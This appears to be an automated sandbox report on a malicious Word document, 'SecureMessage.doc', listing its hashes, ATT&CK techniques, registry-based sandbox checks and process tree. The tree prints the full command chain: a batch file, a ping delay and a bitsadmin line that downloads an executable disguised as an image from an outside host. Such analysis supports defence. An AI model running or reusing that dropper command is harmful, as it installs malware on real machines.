3d808601a47c9ae6c1c121a5eb3297ebb8a75f3663cc425f92fc541b90c8200e

General

Target

SecureMessage.doc
Size

82KB
MD5

b6bf42a76eb8cea70cb0a9ba2b8f31d5
SHA1

fc27036fefb683e218140e1f0af78f23d711a866
SHA256

3d808601a47c9ae6c1c121a5eb3297ebb8a75f3663cc425f92fc541b90c8200e
SHA512

8c0d9633420537bc3c8c16114959fd9648a31f7ca1fab536a67cd0ca6acb039769f9b0a4845679f32616dcbf16e1efbe6bbed9a53be43dc35cf5a06017e847e0

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	1052	2132	cmd.exe	WINWORD.EXE

Deletes itself 1 IoCs

Processes:

WINWORD.EXE

pid process

2132 WINWORD.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

464 bitsadmin.exe

pid	process
464	bitsadmin.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1968 PING.EXE
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

2132 WINWORD.EXE
2132 WINWORD.EXE
Suspicious behavior: RenamesItself 1 IoCs

Processes:

WINWORD.EXE

pid process

2132 WINWORD.EXE

pid	process
1968	PING.EXE

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

WINWORD.EXE

pid	process
2132	WINWORD.EXE
2132	WINWORD.EXE
2132	WINWORD.EXE
2132	WINWORD.EXE
2132	WINWORD.EXE
2132	WINWORD.EXE
2132	WINWORD.EXE
2132	WINWORD.EXE
2132	WINWORD.EXE
2132	WINWORD.EXE
2132	WINWORD.EXE
2132	WINWORD.EXE
2132	WINWORD.EXE
2132	WINWORD.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

WINWORD.EXEcmd.exe

description	pid	process	target process
PID 2132 wrote to memory of 1052	2132	WINWORD.EXE	cmd.exe
PID 2132 wrote to memory of 1052	2132	WINWORD.EXE	cmd.exe
PID 1052 wrote to memory of 1968	1052	cmd.exe	PING.EXE
PID 1052 wrote to memory of 1968	1052	cmd.exe	PING.EXE
PID 1052 wrote to memory of 464	1052	cmd.exe	bitsadmin.exe
PID 1052 wrote to memory of 464	1052	cmd.exe	bitsadmin.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecureMessage.doc" /o ""
1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2132

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c C:\Users\Admin\AppData\Roaming\peppercornensuedsolicit.bat
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1052

C:\Windows\system32\PING.EXE
ping -n 30 127.0.0.1
3⤵
- Runs ping.exe
PID:1968

C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer backup /download /priority high https://usdata.estoreseller.com/images/logoimage.png "C:\Users\Admin\AppData\Roaming\zspriteimperturbably.exe"
3⤵
- Download via BitsAdmin
PID:464

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

BITS Jobs

1

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

1

T1197

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\peppercornensuedsolicit.bat
MD5
3c5d37bcc0200c0c5358e989fee78aa6

SHA1
2460dcf0890ddca0aac438bcbec80aea4ba1c633

SHA256
4dc218c92aa2b223437b34295ceb788ab098a6331d574408b024e8503f26d93c

SHA512
c4d890c110140aa980756a3fdfc490805079132d0e17b35cbb6bdfda6682c8bd166de3d4c4246230ef4dc9453d616d8cff38c5b09f47f84ed44ef1a6b4eb5d30

Download Submit
memory/464-319-0x0000000000000000-mapping.dmp

Download
memory/1052-281-0x0000000000000000-mapping.dmp

Download
memory/1968-284-0x0000000000000000-mapping.dmp

Download
memory/2132-116-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmp

Filesize
64KB

Download
memory/2132-115-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmp

Filesize
64KB

Download
memory/2132-117-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmp

Filesize
64KB

Download
memory/2132-118-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmp

Filesize
64KB

Download
memory/2132-119-0x000001B197040000-0x000001B197042000-memory.dmp

Filesize
8KB

Download
memory/2132-120-0x000001B197040000-0x000001B197042000-memory.dmp

Filesize
8KB

Download
memory/2132-121-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmp

Filesize
64KB

Download
memory/2132-122-0x000001B197040000-0x000001B197042000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads